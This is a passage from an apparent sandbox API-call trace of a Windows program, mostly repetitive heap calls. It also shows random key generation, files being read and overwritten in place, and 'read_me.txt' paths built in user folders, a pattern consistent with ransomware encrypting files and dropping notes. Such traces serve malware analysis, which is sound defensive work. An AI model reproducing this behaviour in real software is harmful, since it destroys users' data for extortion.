returned 0x7d12368 [0078.515] GetProcessHeap () returned 0x4f10000 [0078.515] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0078.515] GetProcessHeap () returned 0x4f10000 [0078.515] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0078.515] GetProcessHeap () returned 0x4f10000 [0078.515] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0078.515] GetProcessHeap () returned 0x4f10000 [0078.515] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0078.515] GetProcessHeap () returned 0x4f10000 [0078.515] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0078.515] GetProcessHeap () returned 0x4f10000 [0078.515] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0078.515] GetProcessHeap () returned 0x4f10000 [0078.515] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0078.515] GetProcessHeap () returned 0x4f10000 [0078.515] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0078.515] GetProcessHeap () returned 0x4f10000 [0078.515] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0078.515] GetProcessHeap () returned 0x4f10000 [0078.515] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x24) returned 0x7d4bb68 [0078.515] GetProcessHeap () returned 0x4f10000 [0078.515] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0078.515] GetProcessHeap () returned 0x4f10000 [0078.515] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x40) returned 0x7d51418 [0078.515] GetProcessHeap () returned 0x4f10000 [0078.515] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d4bb68 | out: hHeap=0x4f10000) returned 1 [0078.515] GetProcessHeap () returned 0x4f10000 [0078.515] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f70a70 [0078.515] GetProcessHeap () returned 0x4f10000 [0078.515] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d51418 | out: hHeap=0x4f10000) returned 1 [0078.515] GetProcessHeap () returned 0x4f10000 [0078.515] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f770 [0078.515] GetProcessHeap () returned 0x4f10000 [0078.516] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f70a70 | out: hHeap=0x4f10000) returned 1 [0078.516] GetProcessHeap () returned 0x4f10000 [0078.516] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0078.516] GetProcessHeap () returned 0x4f10000 [0078.516] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f770 | out: hHeap=0x4f10000) returned 1 [0078.516] GetProcessHeap () returned 0x4f10000 [0078.516] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0078.516] GetProcessHeap () returned 0x4f10000 [0078.516] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0078.516] GetProcessHeap () returned 0x4f10000 [0078.516] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0078.516] GetProcessHeap () returned 0x4f10000 [0078.516] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0078.516] GetProcessHeap () returned 0x4f10000 [0078.516] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0078.516] GetProcessHeap () returned 0x4f10000 [0078.516] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0078.516] GetProcessHeap () returned 0x4f10000 [0078.516] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0078.516] GetProcessHeap () returned 0x4f10000 [0078.516] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0078.516] GetProcessHeap () returned 0x4f10000 [0078.516] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0078.516] GetProcessHeap () returned 0x4f10000 [0078.516] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0078.516] GetProcessHeap () returned 0x4f10000 [0078.516] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0078.516] GetProcessHeap () returned 0x4f10000 [0078.516] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0078.517] GetProcessHeap () returned 0x4f10000 [0078.517] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0078.517] GetProcessHeap () returned 0x4f10000 [0078.517] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0078.517] GetProcessHeap () returned 0x4f10000 [0078.517] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0078.517] GetProcessHeap () returned 0x4f10000 [0078.517] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0078.517] GetProcessHeap () returned 0x4f10000 [0078.517] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0078.517] GetProcessHeap () returned 0x4f10000 [0078.517] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0078.517] GetProcessHeap () returned 0x4f10000 [0078.517] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0078.517] GetProcessHeap () returned 0x4f10000 [0078.517] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0078.517] GetProcessHeap () returned 0x4f10000 [0078.517] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0078.517] GetProcessHeap () returned 0x4f10000 [0078.517] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0078.517] GetProcessHeap () returned 0x4f10000 [0078.517] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0078.517] GetProcessHeap () returned 0x4f10000 [0078.517] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0078.517] GetProcessHeap () returned 0x4f10000 [0078.517] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x220) returned 0x7cf6bf8 [0078.517] GetProcessHeap () returned 0x4f10000 [0078.517] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0078.517] GetProcessHeap () returned 0x4f10000 [0078.518] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12358 | out: hHeap=0x4f10000) returned 1 [0078.518] GetProcessHeap () returned 0x4f10000 [0078.518] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56898 | out: hHeap=0x4f10000) returned 1 [0078.518] GetProcessHeap () returned 0x4f10000 [0078.518] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf6bf8 | out: hHeap=0x4f10000) returned 1 [0078.518] GetProcessHeap () returned 0x4f10000 [0078.518] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56870 | out: hHeap=0x4f10000) returned 1 [0078.518] SetFilePointerEx (in: hFile=0x7f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.518] WriteFile (in: hFile=0x7f8, lpBuffer=0x7d7f878*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x84afd44, lpOverlapped=0x0 | out: lpBuffer=0x7d7f878*, lpNumberOfBytesWritten=0x84afd44*=0x100, lpOverlapped=0x0) returned 1 [0078.518] WriteFile (in: hFile=0x7f8, lpBuffer=0x84afd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x84afd44, lpOverlapped=0x0 | out: lpBuffer=0x84afd48*, lpNumberOfBytesWritten=0x84afd44*=0x4, lpOverlapped=0x0) returned 1 [0078.518] GetProcessHeap () returned 0x4f10000 [0078.518] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b610d8 | out: hHeap=0x4f10000) returned 1 [0078.518] GetProcessHeap () returned 0x4f10000 [0078.518] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56528 | out: hHeap=0x4f10000) returned 1 [0078.518] GetProcessHeap () returned 0x4f10000 [0078.518] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f878 | out: hHeap=0x4f10000) returned 1 [0078.518] CloseHandle (hObject=0x7f8) returned 1 [0078.524] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 32 [0078.524] GetProcessHeap () returned 0x4f10000 [0078.524] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8a80048 [0078.524] wnsprintfW (in: pszDest=0x8a80048, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\*") returned 46 [0078.524] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\*", lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x2000002, ftCreationTime.dwLowDateTime=0x7d04758, ftCreationTime.dwHighDateTime=0x59000158, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x84001d, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x80, nFileSizeHigh=0x0, nFileSizeLow=0x930041d2, dwReserved0=0x7d778b0, dwReserved1=0x4f10000, cFileName="毰ߏ", cAlternateFileName="")) returned 0xffffffff [0078.524] wnsprintfW (in: pszDest=0x8a80048, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\read_me.txt") returned 56 [0078.524] GetProcessHeap () returned 0x4f10000 [0078.524] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8a80048 | out: hHeap=0x4f10000) returned 1 [0078.524] InterlockedExchangeAdd (in: Addend=0x40f16c, Value=1 | out: Addend=0x40f16c) returned 85 [0078.524] GetProcessHeap () returned 0x4f10000 [0078.524] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b20098 | out: hHeap=0x4f10000) returned 1 [0078.524] GetProcessHeap () returned 0x4f10000 [0078.524] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8b20098 [0078.524] wnsprintfW (in: pszDest=0x8b20098, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates\\*") returned 45 [0078.524] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates\\*", lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x2000002, ftCreationTime.dwLowDateTime=0x7d04758, ftCreationTime.dwHighDateTime=0x59000158, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x84001d, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x80, nFileSizeHigh=0x0, nFileSizeLow=0x930041d2, dwReserved0=0x7d778b0, dwReserved1=0x4f10000, cFileName="毰ߏ", cAlternateFileName="")) returned 0xffffffff [0078.524] wnsprintfW (in: pszDest=0x8b20098, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates\\read_me.txt") returned 55 [0078.524] GetProcessHeap () returned 0x4f10000 [0078.524] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b20098 | out: hHeap=0x4f10000) returned 1 [0078.524] InterlockedExchangeAdd (in: Addend=0x40f16c, Value=1 | out: Addend=0x40f16c) returned 86 [0078.524] GetProcessHeap () returned 0x4f10000 [0078.525] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8dd10f8 | out: hHeap=0x4f10000) returned 1 [0078.525] SetFilePointerEx (in: hFile=0x7a4, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.525] ReadFile (in: hFile=0x7a4, lpBuffer=0x84afd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x84afd08, lpOverlapped=0x0 | out: lpBuffer=0x84afd4c*, lpNumberOfBytesRead=0x84afd08*=0x0, lpOverlapped=0x0) returned 1 [0078.525] SetFilePointerEx (in: hFile=0x7a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.525] GetProcessHeap () returned 0x4f10000 [0078.525] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f878 [0078.525] GetProcessHeap () returned 0x4f10000 [0078.525] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x20) returned 0x7d56528 [0078.525] SystemFunction036 (in: RandomBuffer=0x7d56528, RandomBufferLength=0x20 | out: RandomBuffer=0x7d56528) returned 1 [0078.525] GetProcessHeap () returned 0x4f10000 [0078.525] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x1000) returned 0x8b610d8 [0078.525] ReadFile (in: hFile=0x7a4, lpBuffer=0x8b610d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x84afd08, lpOverlapped=0x0 | out: lpBuffer=0x8b610d8*, lpNumberOfBytesRead=0x84afd08*=0x496, lpOverlapped=0x0) returned 1 [0078.540] SetFilePointerEx (in: hFile=0x7a4, liDistanceToMove=0xfffffb6a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.540] WriteFile (in: hFile=0x7a4, lpBuffer=0x8b610d8*, nNumberOfBytesToWrite=0x496, lpNumberOfBytesWritten=0x84afd44, lpOverlapped=0x0 | out: lpBuffer=0x8b610d8*, lpNumberOfBytesWritten=0x84afd44*=0x496, lpOverlapped=0x0) returned 1 [0078.540] GetProcessHeap () returned 0x4f10000 [0078.540] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12358 [0078.540] GetProcessHeap () returned 0x4f10000 [0078.540] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0078.540] GetProcessHeap () returned 0x4f10000 [0078.540] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x8, Ptr=0x7d12368, Size=0x20) returned 0x7d56870 [0078.540] GetProcessHeap () returned 0x4f10000 [0078.540] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0078.540] GetProcessHeap () returned 0x4f10000 [0078.540] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x0, Ptr=0x7d12368, Size=0x20) returned 0x7d56898 [0078.540] GetProcessHeap () returned 0x4f10000 [0078.540] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0078.540] GetProcessHeap () returned 0x4f10000 [0078.540] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0078.540] GetProcessHeap () returned 0x4f10000 [0078.540] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0078.540] GetProcessHeap () returned 0x4f10000 [0078.541] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0078.541] GetProcessHeap () returned 0x4f10000 [0078.541] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0078.541] GetProcessHeap () returned 0x4f10000 [0078.541] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0078.541] GetProcessHeap () returned 0x4f10000 [0078.541] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0078.541] GetProcessHeap () returned 0x4f10000 [0078.541] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0078.541] GetProcessHeap () returned 0x4f10000 [0078.541] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0078.541] GetProcessHeap () returned 0x4f10000 [0078.541] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0078.541] GetProcessHeap () returned 0x4f10000 [0078.541] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0078.541] GetProcessHeap () returned 0x4f10000 [0078.541] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0078.541] GetProcessHeap () returned 0x4f10000 [0078.541] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0078.541] GetProcessHeap () returned 0x4f10000 [0078.541] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0078.541] GetProcessHeap () returned 0x4f10000 [0078.541] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0078.541] GetProcessHeap () returned 0x4f10000 [0078.541] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0078.541] GetProcessHeap () returned 0x4f10000 [0078.541] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0078.541] GetProcessHeap () returned 0x4f10000 [0078.541] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0078.541] GetProcessHeap () returned 0x4f10000 [0078.541] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0078.541] GetProcessHeap () returned 0x4f10000 [0078.541] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0078.541] GetProcessHeap () returned 0x4f10000 [0078.541] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0078.541] GetProcessHeap () returned 0x4f10000 [0078.541] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0078.541] GetProcessHeap () returned 0x4f10000 [0078.541] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0078.542] GetProcessHeap () returned 0x4f10000 [0078.542] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0078.542] GetProcessHeap () returned 0x4f10000 [0078.542] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0078.542] GetProcessHeap () returned 0x4f10000 [0078.542] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0078.542] GetProcessHeap () returned 0x4f10000 [0078.542] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0078.542] GetProcessHeap () returned 0x4f10000 [0078.542] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0078.542] GetProcessHeap () returned 0x4f10000 [0078.542] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0078.542] GetProcessHeap () returned 0x4f10000 [0078.542] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0078.542] GetProcessHeap () returned 0x4f10000 [0078.542] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0078.542] GetProcessHeap () returned 0x4f10000 [0078.542] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0078.542] GetProcessHeap () returned 0x4f10000 [0078.542] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0078.542] GetProcessHeap () returned 0x4f10000 [0078.542] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x24) returned 0x7d4bb68 [0078.542] GetProcessHeap () returned 0x4f10000 [0078.542] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0078.542] GetProcessHeap () returned 0x4f10000 [0078.542] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x40) returned 0x7d51418 [0078.542] GetProcessHeap () returned 0x4f10000 [0078.542] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d4bb68 | out: hHeap=0x4f10000) returned 1 [0078.542] GetProcessHeap () returned 0x4f10000 [0078.542] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f70a70 [0078.542] GetProcessHeap () returned 0x4f10000 [0078.542] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d51418 | out: hHeap=0x4f10000) returned 1 [0078.542] GetProcessHeap () returned 0x4f10000 [0078.542] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f770 [0078.542] GetProcessHeap () returned 0x4f10000 [0078.542] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f70a70 | out: hHeap=0x4f10000) returned 1 [0078.542] GetProcessHeap () returned 0x4f10000 [0078.542] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0078.543] GetProcessHeap () returned 0x4f10000 [0078.543] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f770 | out: hHeap=0x4f10000) returned 1 [0078.543] GetProcessHeap () returned 0x4f10000 [0078.543] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0078.543] GetProcessHeap () returned 0x4f10000 [0078.543] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0078.543] GetProcessHeap () returned 0x4f10000 [0078.543] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0078.543] GetProcessHeap () returned 0x4f10000 [0078.543] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0078.543] GetProcessHeap () returned 0x4f10000 [0078.543] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0078.543] GetProcessHeap () returned 0x4f10000 [0078.543] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0078.543] GetProcessHeap () returned 0x4f10000 [0078.543] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0078.543] GetProcessHeap () returned 0x4f10000 [0078.543] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0078.543] GetProcessHeap () returned 0x4f10000 [0078.543] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0078.543] GetProcessHeap () returned 0x4f10000 [0078.543] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0078.543] GetProcessHeap () returned 0x4f10000 [0078.543] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0078.543] GetProcessHeap () returned 0x4f10000 [0078.543] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0078.543] GetProcessHeap () returned 0x4f10000 [0078.543] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0078.544] GetProcessHeap () returned 0x4f10000 [0078.544] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0078.544] GetProcessHeap () returned 0x4f10000 [0078.544] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0078.544] GetProcessHeap () returned 0x4f10000 [0078.544] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0078.544] GetProcessHeap () returned 0x4f10000 [0078.544] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0078.544] GetProcessHeap () returned 0x4f10000 [0078.544] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0078.544] GetProcessHeap () returned 0x4f10000 [0078.544] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0078.544] GetProcessHeap () returned 0x4f10000 [0078.544] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0078.544] GetProcessHeap () returned 0x4f10000 [0078.544] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0078.544] GetProcessHeap () returned 0x4f10000 [0078.544] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0078.544] GetProcessHeap () returned 0x4f10000 [0078.544] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0078.544] GetProcessHeap () returned 0x4f10000 [0078.544] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0078.544] GetProcessHeap () returned 0x4f10000 [0078.544] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x220) returned 0x7cf6bf8 [0078.544] GetProcessHeap () returned 0x4f10000 [0078.544] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0078.544] GetProcessHeap () returned 0x4f10000 [0078.544] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12358 | out: hHeap=0x4f10000) returned 1 [0078.544] GetProcessHeap () returned 0x4f10000 [0078.544] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56898 | out: hHeap=0x4f10000) returned 1 [0078.544] GetProcessHeap () returned 0x4f10000 [0078.545] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf6bf8 | out: hHeap=0x4f10000) returned 1 [0078.545] GetProcessHeap () returned 0x4f10000 [0078.545] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56870 | out: hHeap=0x4f10000) returned 1 [0078.545] SetFilePointerEx (in: hFile=0x7a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.545] WriteFile (in: hFile=0x7a4, lpBuffer=0x7d7f878*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x84afd44, lpOverlapped=0x0 | out: lpBuffer=0x7d7f878*, lpNumberOfBytesWritten=0x84afd44*=0x100, 